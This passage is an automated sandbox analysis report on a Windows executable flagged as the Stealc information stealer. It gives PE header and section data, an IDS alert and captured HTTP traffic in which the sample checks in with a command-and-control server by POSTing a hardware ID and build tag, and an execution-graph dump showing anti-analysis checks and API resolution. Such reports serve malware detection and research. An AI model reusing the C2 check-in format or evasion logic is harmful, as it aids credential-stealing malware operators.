                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F9EA525C47Ah
                                lss esp, dword ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [ecx], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2e70000x676000d617b12950e329e78f8b4976918a9f8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x2ea0000x2a50000x200a8a0227c39b42a678cbd989378b97d91unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                kkezmvxm0x58f0000x1a30000x1a240039e762fe5297fa325e20704d4570795bFalse0.9947383536312014PGP Secret Sub-key -7.953994841848818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                fehabrus0x7320000x10000x400079d31e015e30c1bb5ab9a3eb227320fFalse0.7197265625data5.779483051242652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x7330000x30000x2200361a99fcd195dbe15428a6fb8e1278d3False0.06353400735294118DOS executable (COM)0.726021614226017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-28T15:28:01.711498+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 28, 2024 15:28:00.532157898 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 15:28:00.537832975 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 15:28:00.537940025 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 15:28:00.538064957 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 15:28:00.543446064 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 15:28:01.428689003 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 15:28:01.428816080 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 15:28:01.432284117 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 15:28:01.437629938 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 15:28:01.711447954 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 15:28:01.711498022 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 15:28:05.615484953 CET4970480192.168.2.5185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549704185.215.113.206801716C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 28, 2024 15:28:00.538064957 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 28, 2024 15:28:01.428689003 CET203INHTTP/1.1 200 OK
                                Date: Mon, 28 Oct 2024 14:28:01 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 28, 2024 15:28:01.432284117 CET412OUTPOST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJ
                                Host: 185.215.113.206
                                Content-Length: 210
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 37 43 42 34 35 46 43 37 43 34 32 35 33 38 31 37 36 37 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 2d 2d 0d 0a
                                Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="hwid"5F7CB45FC7C4253817676------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build"tale------BGCAFHCAKFBFIECAFIIJ--
                                Oct 28, 2024 15:28:01.711447954 CET210INHTTP/1.1 200 OK
                                Date: Mon, 28 Oct 2024 14:28:01 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:10:27:56
                                Start date:28/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xe60000
                                File size:2'151'424 bytes
                                MD5 hash:15716110BA606BED84E305D1D8525EBA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:3.5%
                                  Total number of Nodes:1327
                                  Total number of Limit Nodes:24
                                  execution_graph 37819 e76c90 37864 e622a0 37819->37864 37843 e76d04 37844 e7acc0 4 API calls 37843->37844 37845 e76d0b 37844->37845 37846 e7acc0 4 API calls 37845->37846 37847 e76d12 37846->37847 37848 e7acc0 4 API calls 37847->37848 37849 e76d19 37848->37849 37850 e7acc0 4 API calls 37849->37850 37851 e76d20 37850->37851 38016 e7abb0 37851->38016 37853 e76dac 38020 e76bc0 GetSystemTime 37853->38020 37854 e76d29 37854->37853 37857 e76d62 OpenEventA 37854->37857 37859 e76d95 CloseHandle Sleep 37857->37859 37860 e76d79 37857->37860 37862 e76daa 37859->37862 37863 e76d81 CreateEventA 37860->37863 37861 e76db6 CloseHandle ExitProcess 37862->37854 37863->37853 38217 e64610 37864->38217 37866 e622b4 37867 e64610 2 API calls 37866->37867 37868 e622cd 37867->37868 37869 e64610 2 API calls 37868->37869 37870 e622e6 37869->37870 37871 e64610 2 API calls 37870->37871 37872 e622ff 37871->37872 37873 e64610 2 API calls 37872->37873 37874 e62318 37873->37874 37875 e64610 2 API calls 37874->37875 37876 e62331 37875->37876 37877 e64610 2 API calls 37876->37877 37878 e6234a 37877->37878 37879 e64610 2 API calls 37878->37879 37880 e62363 37879->37880 37881 e64610 2 API calls 37880->37881 37882 e6237c 37881->37882 37883 e64610 2 API calls 37882->37883 37884 e62395 37883->37884 37885 e64610 2 API calls 37884->37885 37886 e623ae 37885->37886 37887 e64610 2 API calls 37886->37887 37888 e623c7 37887->37888 37889 e64610 2 API calls 37888->37889 37890 e623e0 37889->37890 37891 e64610 2 API calls 37890->37891 37892 e623f9 37891->37892 37893 e64610 2 API calls 37892->37893 37894 e62412 37893->37894 37895 e64610 2 API calls 37894->37895 37896 e6242b 37895->37896 37897 e64610 2 API calls 37896->37897 37898 e62444 37897->37898 37899 e64610 2 API calls 37898->37899 37900 e6245d 37899->37900 37901 e64610 2 API calls 37900->37901 37902 e62476 37901->37902 37903 e64610 2 API calls 37902->37903 37904 e6248f 37903->37904 37905 e64610 2 API calls 37904->37905 37906 e624a8 37905->37906 37907 e64610 2 API calls 37906->37907 37908 e624c1 37907->37908 37909 e64610 2 API calls 37908->37909 37910 e624da 37909->37910 37911 e64610 2 API calls 37910->37911 37912 e624f3 37911->37912 37913 e64610 2 API calls 37912->37913 37914 e6250c 37913->37914 37915 e64610 2 API calls 37914->37915 37916 e62525 37915->37916 37917 e64610 2 API calls 37916->37917 37918 e6253e 37917->37918 37919 e64610 2 API calls 37918->37919 37920 e62557 37919->37920 37921 e64610 2 API calls 37920->37921 37922 e62570 37921->37922 37923 e64610 2 API calls 37922->37923 37924 e62589 37923->37924 37925 e64610 2 API calls 37924->37925 37926 e625a2 37925->37926 37927 e64610 2 API calls 37926->37927 37928 e625bb 37927->37928 37929 e64610 2 API calls 37928->37929 37930 e625d4 37929->37930 37931 e64610 2 API calls 37930->37931 37932 e625ed 37931->37932 37933 e64610 2 API calls 37932->37933 37934 e62606 37933->37934 37935 e64610 2 API calls 37934->37935 37936 e6261f 37935->37936 37937 e64610 2 API calls 37936->37937 37938 e62638 37937->37938 37939 e64610 2 API calls 37938->37939 37940 e62651 37939->37940 37941 e64610 2 API calls 37940->37941 37942 e6266a 37941->37942 37943 e64610 2 API calls 37942->37943 37944 e62683 37943->37944 37945 e64610 2 API calls 37944->37945 37946 e6269c 37945->37946 37947 e64610 2 API calls 37946->37947 37948 e626b5 37947->37948 37949 e64610 2 API calls 37948->37949 37950 e626ce 37949->37950 37951 e79bb0 37950->37951 38222 e79aa0 GetPEB 37951->38222 37953 e79bb8 37954 e79de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37953->37954 37955 e79bca 37953->37955 37956 e79e44 GetProcAddress 37954->37956 37957 e79e5d 37954->37957 37958 e79bdc 21 API calls 37955->37958 37956->37957 37959 e79e96 37957->37959 37960 e79e66 GetProcAddress GetProcAddress 37957->37960 37958->37954 37961 e79e9f GetProcAddress 37959->37961 37962 e79eb8 37959->37962 37960->37959 37961->37962 37963 e79ec1 GetProcAddress 37962->37963 37964 e79ed9 37962->37964 37963->37964 37965 e79ee2 GetProcAddress GetProcAddress 37964->37965 37966 e76ca0 37964->37966 37965->37966 37967 e7aa50 37966->37967 37968 e7aa60 37967->37968 37969 e76cad 37968->37969 37970 e7aa8e lstrcpy 37968->37970 37971 e611d0 37969->37971 37970->37969 37972 e611e8 37971->37972 37973 e61217 37972->37973 37974 e6120f ExitProcess 37972->37974 37975 e61160 GetSystemInfo 37973->37975 37976 e61184 37975->37976 37977 e6117c ExitProcess 37975->37977 37978 e61110 GetCurrentProcess VirtualAllocExNuma 37976->37978 37979 e61141 ExitProcess 37978->37979 37980 e61149 37978->37980 38223 e610a0 VirtualAlloc 37980->38223 37983 e61220 38227 e78b40 37983->38227 37986 e61249 __aulldiv 37987 e6129a 37986->37987 37988 e61292 ExitProcess 37986->37988 37989 e76a10 GetUserDefaultLangID 37987->37989 37990 e76a73 37989->37990 37991 e76a32 37989->37991 37997 e61190 37990->37997 37991->37990 37992 e76a57 ExitProcess 37991->37992 37993 e76a43 ExitProcess 37991->37993 37994 e76a61 ExitProcess 37991->37994 37995 e76a4d ExitProcess 37991->37995 37996 e76a6b ExitProcess 37991->37996 37996->37990 37998 e77a70 3 API calls 37997->37998 38000 e6119e 37998->38000 37999 e611cc 38004 e779e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37999->38004 38000->37999 38001 e779e0 3 API calls 38000->38001 38002 e611b7 38001->38002 38002->37999 38003 e611c4 ExitProcess 38002->38003 38005 e76cd0 38004->38005 38006 e77a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 38005->38006 38007 e76ce3 38006->38007 38008 e7acc0 38007->38008 38229 e7aa20 38008->38229 38010 e7acd1 lstrlen 38012 e7acf0 38010->38012 38011 e7ad28 38230 e7aab0 38011->38230 38012->38011 38014 e7ad0a lstrcpy lstrcat 38012->38014 38014->38011 38015 e7ad34 38015->37843 38017 e7abcb 38016->38017 38018 e7ac1b 38017->38018 38019 e7ac09 lstrcpy 38017->38019 38018->37854 38019->38018 38234 e76ac0 38020->38234 38022 e76c2e 38023 e76c38 sscanf 38022->38023 38263 e7ab10 38023->38263 38025 e76c4a SystemTimeToFileTime SystemTimeToFileTime 38026 e76c80 38025->38026 38027 e76c6e 38025->38027 38029 e75d60 38026->38029 38027->38026 38028 e76c78 ExitProcess 38027->38028 38030 e75d6d 38029->38030 38031 e7aa50 lstrcpy 38030->38031 38032 e75d7e 38031->38032 38265 e7ab30 lstrlen 38032->38265 38035 e7ab30 2 API calls 38036 e75db4 38035->38036 38037 e7ab30 2 API calls 38036->38037 38038 e75dc4 38037->38038 38269 e76680 38038->38269 38041 e7ab30 2 API calls 38042 e75de3 38041->38042 38043 e7ab30 2 API calls 38042->38043 38044 e75df0 38043->38044 38045 e7ab30 2 API calls 38044->38045 38046 e75dfd 38045->38046 38047 e7ab30 2 API calls 38046->38047 38048 e75e49 38047->38048 38278 e626f0 38048->38278 38056 e75f13 38057 e76680 lstrcpy 38056->38057 38058 e75f25 38057->38058 38059 e7aab0 lstrcpy 38058->38059 38060 e75f42 38059->38060 38061 e7acc0 4 API calls 38060->38061 38062 e75f5a 38061->38062 38063 e7abb0 lstrcpy 38062->38063 38064 e75f66 38063->38064 38065 e7acc0 4 API calls 38064->38065 38066 e75f8a 38065->38066 38067 e7abb0 lstrcpy 38066->38067 38068 e75f96 38067->38068 38069 e7acc0 4 API calls 38068->38069 38070 e75fba 38069->38070 38071 e7abb0 lstrcpy 38070->38071 38072 e75fc6 38071->38072 38073 e7aa50 lstrcpy 38072->38073 38074 e75fee 38073->38074 39004 e77690 GetWindowsDirectoryA 38074->39004 38077 e7aab0 lstrcpy 38078 e76008 38077->38078 39014 e648d0 38078->39014 38080 e7600e 39159 e719f0 38080->39159 38082 e76016 38083 e7aa50 lstrcpy 38082->38083 38084 e76039 38083->38084 38085 e61590 lstrcpy 38084->38085 38086 e7604d 38085->38086 39175 e659b0 34 API calls ctype 38086->39175 38088 e76053 39176 e71280 lstrlen lstrcpy 38088->39176 38090 e7605e 38091 e7aa50 lstrcpy 38090->38091 38092 e76082 38091->38092 38093 e61590 lstrcpy 38092->38093 38094 e76096 38093->38094 39177 e659b0 34 API calls ctype 38094->39177 38096 e7609c 39178 e70fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 38096->39178 38098 e760a7 38099 e7aa50 lstrcpy 38098->38099 38100 e760c9 38099->38100 38101 e61590 lstrcpy 38100->38101 38102 e760dd 38101->38102 39179 e659b0 34 API calls ctype 38102->39179 38104 e760e3 39180 e71170 StrCmpCA lstrlen lstrcpy 38104->39180 38106 e760ee 38107 e61590 lstrcpy 38106->38107 38108 e76105 38107->38108 39181 e71c60 115 API calls 38108->39181 38110 e7610a 38111 e7aa50 lstrcpy 38110->38111 38112 e76126 38111->38112 39182 e65000 7 API calls 38112->39182 38114 e7612b 38115 e61590 lstrcpy 38114->38115 38116 e761ab 38115->38116 39183 e708a0 285 API calls 38116->39183 38118 e761b0 38119 e7aa50 lstrcpy 38118->38119 38120 e761d6 38119->38120 38121 e61590 lstrcpy 38120->38121 38122 e761ea 38121->38122 39184 e659b0 34 API calls ctype 38122->39184 38124 e761f0 39185 e713c0 StrCmpCA lstrlen lstrcpy 38124->39185 38126 e761fb 38127 e61590 lstrcpy 38126->38127 38128 e7623b 38127->38128 39186 e61ec0 59 API calls 38128->39186 38130 e76240 38131 e762e2 38130->38131 38132 e76250 38130->38132 38133 e7aab0 lstrcpy 38131->38133 38134 e7aa50 lstrcpy 38132->38134 38135 e762f5 38133->38135 38136 e76270 38134->38136 38137 e61590 lstrcpy 38135->38137 38138 e61590 lstrcpy 38136->38138 38139 e76309 38137->38139 38140 e76284 38138->38140 39190 e659b0 34 API calls ctype 38139->39190 39187 e659b0 34 API calls ctype 38140->39187 38143 e7630f 39191 e737b0 31 API calls 38143->39191 38144 e7628a 39188 e71520 19 API calls ctype 38144->39188 38147 e76295 38149 e61590 lstrcpy 38147->38149 38148 e762da 38151 e7635b 38148->38151 38152 e61590 lstrcpy 38148->38152 38150 e762d5 38149->38150 39189 e74010 67 API calls 38150->39189 38154 e76380 38151->38154 38156 e61590 lstrcpy 38151->38156 38155 e76337 38152->38155 38157 e763a5 38154->38157 38158 e61590 lstrcpy 38154->38158 39192 e74300 57 API calls 2 library calls 38155->39192 38161 e7637b 38156->38161 38160 e763ca 38157->38160 38164 e61590 lstrcpy 38157->38164 38162 e763a0 38158->38162 38165 e763ef 38160->38165 38171 e61590 lstrcpy 38160->38171 39194 e749d0 88 API calls ctype 38161->39194 39195 e74e00 61 API calls ctype 38162->39195 38163 e7633c 38169 e61590 lstrcpy 38163->38169 38170 e763c5 38164->38170 38167 e76414 38165->38167 38172 e61590 lstrcpy 38165->38172 38174 e76439 38167->38174 38179 e61590 lstrcpy 38167->38179 38173 e76356 38169->38173 39196 e74fc0 65 API calls 38170->39196 38176 e763ea 38171->38176 38177 e7640f 38172->38177 39193 e75350 44 API calls 38173->39193 38180 e76460 38174->38180 38186 e61590 lstrcpy 38174->38186 39197 e75190 63 API calls ctype 38176->39197 39198 e67770 107 API calls ctype 38177->39198 38185 e76434 38179->38185 38182 e76503 38180->38182 38183 e76470 38180->38183 38187 e7aab0 lstrcpy 38182->38187 38188 e7aa50 lstrcpy 38183->38188 39199 e752a0 61 API calls ctype 38185->39199 38190 e76459 38186->38190 38192 e76516 38187->38192 38193 e76491 38188->38193 39200 e791a0 46 API calls ctype 38190->39200 38194 e61590 lstrcpy 38192->38194 38195 e61590 lstrcpy 38193->38195 38196 e7652a 38194->38196 38197 e764a5 38195->38197 39204 e659b0 34 API calls ctype 38196->39204 39201 e659b0 34 API calls ctype 38197->39201 38200 e76530 39205 e737b0 31 API calls 38200->39205 38201 e764ab 39202 e71520 19 API calls ctype 38201->39202 38204 e764b6 38205 e61590 lstrcpy 38204->38205 38207 e764f6 38205->38207 38206 e7aab0 lstrcpy 38208 e7654c 38206->38208 39203 e74010 67 API calls 38207->39203 38210 e61590 lstrcpy 38208->38210 38212 e76560 38210->38212 38211 e764fb 38211->38206 39206 e659b0 34 API calls ctype 38212->39206 38214 e7656c 38216 e76588 38214->38216 39207 e768d0 9 API calls ctype 38214->39207 38216->37861 38218 e64621 RtlAllocateHeap 38217->38218 38221 e64671 VirtualProtect 38218->38221 38221->37866 38222->37953 38224 e610c2 ctype 38223->38224 38225 e610fd 38224->38225 38226 e610e2 VirtualFree 38224->38226 38225->37983 38226->38225 38228 e61233 GlobalMemoryStatusEx 38227->38228 38228->37986 38229->38010 38231 e7aad2 38230->38231 38232 e7aafc 38231->38232 38233 e7aaea lstrcpy 38231->38233 38232->38015 38233->38232 38235 e7aa50 lstrcpy 38234->38235 38236 e76ad3 38235->38236 38237 e7acc0 4 API calls 38236->38237 38238 e76ae5 38237->38238 38239 e7abb0 lstrcpy 38238->38239 38240 e76aee 38239->38240 38241 e7acc0 4 API calls 38240->38241 38242 e76b07 38241->38242 38243 e7abb0 lstrcpy 38242->38243 38244 e76b10 38243->38244 38245 e7acc0 4 API calls 38244->38245 38246 e76b2a 38245->38246 38247 e7abb0 lstrcpy 38246->38247 38248 e76b33 38247->38248 38249 e7acc0 4 API calls 38248->38249 38250 e76b4c 38249->38250 38251 e7abb0 lstrcpy 38250->38251 38252 e76b55 38251->38252 38253 e7acc0 4 API calls 38252->38253 38254 e76b6f 38253->38254 38255 e7abb0 lstrcpy 38254->38255 38256 e76b78 38255->38256 38257 e7acc0 4 API calls 38256->38257 38258 e76b93 38257->38258 38259 e7abb0 lstrcpy 38258->38259 38260 e76b9c 38259->38260 38261 e7aab0 lstrcpy 38260->38261 38262 e76bb0 38261->38262 38262->38022 38264 e7ab22 38263->38264 38264->38025 38266 e7ab4f 38265->38266 38267 e75da4 38266->38267 38268 e7ab8b lstrcpy 38266->38268 38267->38035 38268->38267 38270 e7abb0 lstrcpy 38269->38270 38271 e76693 38270->38271 38272 e7abb0 lstrcpy 38271->38272 38273 e766a5 38272->38273 38274 e7abb0 lstrcpy 38273->38274 38275 e766b7 38274->38275 38276 e7abb0 lstrcpy 38275->38276 38277 e75dd6 38276->38277 38277->38041 38279 e64610 2 API calls 38278->38279 38280 e62704 38279->38280 38281 e64610 2 API calls 38280->38281 38282 e62727 38281->38282 38283 e64610 2 API calls 38282->38283 38284 e62740 38283->38284 38285 e64610 2 API calls 38284->38285 38286 e62759 38285->38286 38287 e64610 2 API calls 38286->38287 38288 e62786 38287->38288 38289 e64610 2 API calls 38288->38289 38290 e6279f 38289->38290 38291 e64610 2 API calls 38290->38291 38292 e627b8 38291->38292 38293 e64610 2 API calls 38292->38293 38294 e627e5 38293->38294 38295 e64610 2 API calls 38294->38295 38296 e627fe 38295->38296 38297 e64610 2 API calls 38296->38297 38298 e62817 38297->38298 38299 e64610 2 API calls 38298->38299 38300 e62830 38299->38300 38301 e64610 2 API calls 38300->38301 38302 e62849 38301->38302 38303 e64610 2 API calls 38302->38303 38304 e62862 38303->38304 38305 e64610 2 API calls 38304->38305 38306 e6287b 38305->38306 38307 e64610 2 API calls 38306->38307 38308 e62894 38307->38308 38309 e64610 2 API calls 38308->38309 38310 e628ad 38309->38310 38311 e64610 2 API calls 38310->38311 38312 e628c6 38311->38312 38313 e64610 2 API calls 38312->38313 38314 e628df 38313->38314 38315 e64610 2 API calls 38314->38315 38316 e628f8 38315->38316 38317 e64610 2 API calls 38316->38317 38318 e62911 38317->38318 38319 e64610 2 API calls 38318->38319 38320 e6292a 38319->38320 38321 e64610 2 API calls 38320->38321 38322 e62943 38321->38322 38323 e64610 2 API calls 38322->38323 38324 e6295c 38323->38324 38325 e64610 2 API calls 38324->38325 38326 e62975 38325->38326 38327 e64610 2 API calls 38326->38327 38328 e6298e 38327->38328 38329 e64610 2 API calls 38328->38329 38330 e629a7 38329->38330 38331 e64610 2 API calls 38330->38331 38332 e629c0 38331->38332 38333 e64610 2 API calls 38332->38333 38334 e629d9 38333->38334 38335 e64610 2 API calls 38334->38335 38336 e629f2 38335->38336 38337 e64610 2 API calls 38336->38337 38338 e62a0b 38337->38338 38339 e64610 2 API calls 38338->38339 38340 e62a24 38339->38340 38341 e64610 2 API calls 38340->38341 38342 e62a3d 38341->38342 38343 e64610 2 API calls 38342->38343 38344 e62a56 38343->38344 38345 e64610 2 API calls 38344->38345 38346 e62a6f 38345->38346 38347 e64610 2 API calls 38346->38347 38348 e62a88 38347->38348 38349 e64610 2 API calls 38348->38349 38350 e62aa1 38349->38350 38351 e64610 2 API calls 38350->38351 38352 e62aba 38351->38352 38353 e64610 2 API calls 38352->38353 38354 e62ad3 38353->38354 38355 e64610 2 API calls 38354->38355 38356 e62aec 38355->38356 38357 e64610 2 API calls 38356->38357 38358 e62b05 38357->38358 38359 e64610 2 API calls 38358->38359 38360 e62b1e 38359->38360 38361 e64610 2 API calls 38360->38361 38362 e62b37 38361->38362 38363 e64610 2 API calls 38362->38363 38364 e62b50 38363->38364 38365 e64610 2 API calls 38364->38365 38366 e62b69 38365->38366 38367 e64610 2 API calls 38366->38367 38368 e62b82 38367->38368 38369 e64610 2 API calls 38368->38369 38370 e62b9b 38369->38370 38371 e64610 2 API calls 38370->38371 38372 e62bb4 38371->38372 38373 e64610 2 API calls 38372->38373 38374 e62bcd 38373->38374 38375 e64610 2 API calls 38374->38375 38376 e62be6 38375->38376 38377 e64610 2 API calls 38376->38377 38378 e62bff 38377->38378 38379 e64610 2 API calls 38378->38379 38380 e62c18 38379->38380 38381 e64610 2 API calls 38380->38381 38382 e62c31 38381->38382 38383 e64610 2 API calls 38382->38383 38384 e62c4a 38383->38384 38385 e64610 2 API calls 38384->38385 38386 e62c63 38385->38386 38387 e64610 2 API calls 38386->38387 38388 e62c7c 